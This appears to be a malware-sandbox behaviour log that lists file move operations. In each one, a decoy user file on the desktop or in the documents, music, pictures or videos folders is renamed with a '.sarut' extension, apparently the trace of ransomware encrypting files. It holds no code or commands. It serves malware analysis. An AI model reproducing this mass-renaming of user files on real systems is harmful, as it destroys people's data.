Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EFVz.flv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EFVz.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gI1Ph3odyc3WWitg.swf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gI1Ph3odyc3WWitg.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\HDxPsHkhhG.jpg.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\HDxPsHkhhG.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\i1wOhL3vMDC.gif.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\i1wOhL3vMDC.gif	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ig-pKA.docx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ig-pKA.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iPCx0KzGTdc.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iPCx0KzGTdc.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KRom7uq2QFi.m4a.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KRom7uq2QFi.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\msHzUMaVeyMhZg.ods.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\msHzUMaVeyMhZg.ods	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\oYQm89fmHM2V.ppt.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\oYQm89fmHM2V.ppt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\plOBtmmjgx5C31gv7.mkv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\plOBtmmjgx5C31gv7.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\qW ivUaVqr_On1.avi.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\qW ivUaVqr_On1.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Rboqf3f1pV5M.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Rboqf3f1pV5M.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\t9PlAeBS-2DXgBXz.mkv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\t9PlAeBS-2DXgBXz.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uRUwiXJup.flv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uRUwiXJup.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\VDarx005qh2__sirr.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\VDarx005qh2__sirr.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\y7SdTqWYI32_I2EQyR.flv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\y7SdTqWYI32_I2EQyR.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yg8 kLfurYIaQM697h.mkv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yg8 kLfurYIaQM697h.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zDvwnZ.mkv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zDvwnZ.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\-G9kfPr.doc.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\-G9kfPr.doc	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\15jZzXpvGAgxYF0U.docx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\15jZzXpvGAgxYF0U.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\29xL.docx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\29xL.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5BThH.xlsx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5BThH.xlsx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5eEgQJA.doc.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5eEgQJA.doc	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\6agqO0CE.xlsx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\6agqO0CE.xlsx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7Cdo.csv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7Cdo.csv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\A8Lf.pptx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\A8Lf.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ApjV0L.xlsx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ApjV0L.xlsx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bRr UxgKvk lgV DA.pptx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bRr UxgKvk lgV DA.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Dlmumiy0mdd o.xlsx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Dlmumiy0mdd o.xlsx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\E9c6yerqTjnAvgifiGH.pptx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\E9c6yerqTjnAvgifiGH.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\e9_rdw 0S48c8wWGxtcZ.docx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\e9_rdw 0S48c8wWGxtcZ.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\F66QZsvCIiq3.xlsx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\F66QZsvCIiq3.xlsx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\FT5DlVKU9skfgHqGxmUn.ods.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\FT5DlVKU9skfgHqGxmUn.ods	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\g61yn2 WbDs1g.odp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\g61yn2 WbDs1g.odp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GaPuN558 zq.xlsx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GaPuN558 zq.xlsx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gdzkVlfc2.rtf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gdzkVlfc2.rtf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ii08Wr6qQ2it.pptx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ii08Wr6qQ2it.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\INx_XXf1fj2VzxVM7GZ.ppt.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\INx_XXf1fj2VzxVM7GZ.ppt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Jmoep.pps.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Jmoep.pps	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\lZ7mFKQ3H.pdf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\lZ7mFKQ3H.pdf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\MiOR3NQChO8s.rtf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\MiOR3NQChO8s.rtf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mSBpETwT0_vcERkN.odp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mSBpETwT0_vcERkN.odp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\N-K3DozDdSgAnSFGZTgY.xlsx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\N-K3DozDdSgAnSFGZTgY.xlsx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\NX4iP.ppt.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\NX4iP.ppt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\O2S3Yxp w.pptx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\O2S3Yxp w.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\qi4IqurK09.ods.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\qi4IqurK09.ods	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Qt-jSAXq.rtf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Qt-jSAXq.rtf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\S-x55k_cPLVq5X206.pptx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\S-x55k_cPLVq5X206.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\SmhleleUG.pptx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\SmhleleUG.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\SP2GZ4Hm5D5gkPiI7Yd.odt.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\SP2GZ4Hm5D5gkPiI7Yd.odt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ueOgE3Fdxzan.rtf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ueOgE3Fdxzan.rtf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\uzFjE-EbKZbDlUR6.docx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\uzFjE-EbKZbDlUR6.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\w6EPq2zN2ah.ppt.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\w6EPq2zN2ah.ppt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\W6IMk7.doc.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\W6IMk7.doc	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WBp8E7tRnFvGA7kM1v.docx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WBp8E7tRnFvGA7kM1v.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\xDyNG4Bi0L.pptx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\xDyNG4Bi0L.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\XXACe99aeIe9AwdxB.doc.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\XXACe99aeIe9AwdxB.doc	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_JLH3OA.odt.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_JLH3OA.odt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\-avjGaTi5fer-bMia.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\-avjGaTi5fer-bMia.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\8GQt402SpMYiSB.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\8GQt402SpMYiSB.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\9Tpbrmx9-eI2m3we6r.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\9Tpbrmx9-eI2m3we6r.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\ArZI.wav.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\ArZI.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\EfZdtNhwP.wav.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\EfZdtNhwP.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\Hgc-ATkiW0nvYtLeb_2n.wav.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\Hgc-ATkiW0nvYtLeb_2n.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\HLn_CQ4.wav.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\HLn_CQ4.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\iYZ-gLKtWydBalI Lxxb.wav.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\iYZ-gLKtWydBalI Lxxb.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\j pK_84.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\j pK_84.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\NBJbBMpw.wav.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\NBJbBMpw.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\P8IAG.m4a.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\P8IAG.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\RAzu8DVMv-r45eOe8.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\RAzu8DVMv-r45eOe8.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\svbuVRxjZk-A.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\svbuVRxjZk-A.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\xGq9s.wav.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\xGq9s.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\YEmk 2o.m4a.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\YEmk 2o.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\Z29_EgFwKYFm3nLlZNM.wav.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\Z29_EgFwKYFm3nLlZNM.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4mbF.gif.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4mbF.gif	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\pCb9pgcYyZh0BJvZP_h.gif.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\pCb9pgcYyZh0BJvZP_h.gif	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\-cTwhDb_kz0NM.mkv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\-cTwhDb_kz0NM.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\-odfzMtVfgsa IL.swf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\-odfzMtVfgsa IL.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\1wkpap.mkv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\1wkpap.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\4wuSJ8EnkH3MW.swf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\4wuSJ8EnkH3MW.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8caLHfAk0PaW.avi.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8caLHfAk0PaW.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8rejvdNsx1W.flv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8rejvdNsx1W.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\90ZHyHwir.mp4.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\90ZHyHwir.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\AklgegIwErKzeM3EnB.mkv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\AklgegIwErKzeM3EnB.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\AKzil.avi.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\AKzil.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\aY2-M1hNNjjWY.flv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\aY2-M1hNNjjWY.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\BqAvk1V3qDn9l.swf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\BqAvk1V3qDn9l.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\bZE6e7_.mkv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\bZE6e7_.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\DJt2bijl-Kw7JEUBg.mkv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\DJt2bijl-Kw7JEUBg.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\hAf_3U-gHvce4wcnQA_w.mkv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\hAf_3U-gHvce4wcnQA_w.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\HlD5zrxsdUc1Y3OP7nh.mp4.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\HlD5zrxsdUc1Y3OP7nh.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\isz2C.swf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\isz2C.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\J6vHB4Uh4HDmN.swf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\J6vHB4Uh4HDmN.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\KEVeaf.avi.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\KEVeaf.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\kUiTedID_arfjfDWv.swf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\kUiTedID_arfjfDWv.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\LA0fDt.flv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\LA0fDt.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\nzD16NoQ.flv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\nzD16NoQ.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ODTwo4qOOJx.avi.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ODTwo4qOOJx.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\PNAkUcrgBy4hgy2ZfZzW.flv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\PNAkUcrgBy4hgy2ZfZzW.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\Qm7ufohlk1udTd4Kn5.mkv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\Qm7ufohlk1udTd4Kn5.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\qswPmOaFTerp.flv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\qswPmOaFTerp.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\qVm94.swf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\qVm94.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\QWssd9nb3vYvw99.flv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\QWssd9nb3vYvw99.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\RLWhOE4xU0nYY34j.mkv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\RLWhOE4xU0nYY34j.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\SY7CEy_advQ-GPuP.swf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\SY7CEy_advQ-GPuP.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\sz7_xapMC.avi.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\sz7_xapMC.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\UCiGSIuisINE78_i.mp4.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\UCiGSIuisINE78_i.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\UOIbo9FKzWl25DD93Yi9.mp4.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\UOIbo9FKzWl25DD93Yi9.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\X4T9oiLBOsZNDrM.mp4.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\X4T9oiLBOsZNDrM.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\YcDckA2w- DNgH7cL.flv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\YcDckA2w- DNgH7cL.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\21IMcPko8Du_3IsFB-Q.gif.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\21IMcPko8Du_3IsFB-Q.gif	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\kqfuGsV.m4a.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\kqfuGsV.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lpSHh6l1qJtVRTN-Ti0s.swf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lpSHh6l1qJtVRTN-Ti0s.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\Pla8UWh-7PWmaOK2.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\Pla8UWh-7PWmaOK2.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\qBg34ZfuK.pptx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\qBg34ZfuK.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\upDp4KTN.bmp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\upDp4KTN.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\OBWh_DIngrZmxYk.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\OBWh_DIngrZmxYk.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\p uXvDzcIfFbqot.odp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\p uXvDzcIfFbqot.odp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\Pt He.jpg.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\Pt He.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\ug1Kmdfe1kMSfX_H.m4a.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\ug1Kmdfe1kMSfX_H.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\8D Vnyq.pps.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\8D Vnyq.pps	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\BykHThXT56fcYaqQV2X.doc.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\BykHThXT56fcYaqQV2X.doc	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\dv6T5k65sGE5bg7xPK.pps.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\dv6T5k65sGE5bg7xPK.pps	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\GoUIrAAbbfuwwj-FRw.ods.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\GoUIrAAbbfuwwj-FRw.ods	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\hk7Xm32Lt1utxRomo79.pptx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\hk7Xm32Lt1utxRomo79.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\KvTi3ZX.docx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\KvTi3ZX.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\lA9UBwHgz3W.docx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\lA9UBwHgz3W.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\nnz1zWbbzOZyy0IcqsRw.ots.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\nnz1zWbbzOZyy0IcqsRw.ots	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\S-tHiiR.pdf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\S-tHiiR.pdf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\spMPG 9xkkM.odp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\spMPG 9xkkM.odp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\Tgy4aDx5L5gYbgCK1.doc.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\Tgy4aDx5L5gYbgCK1.doc	1	Fn
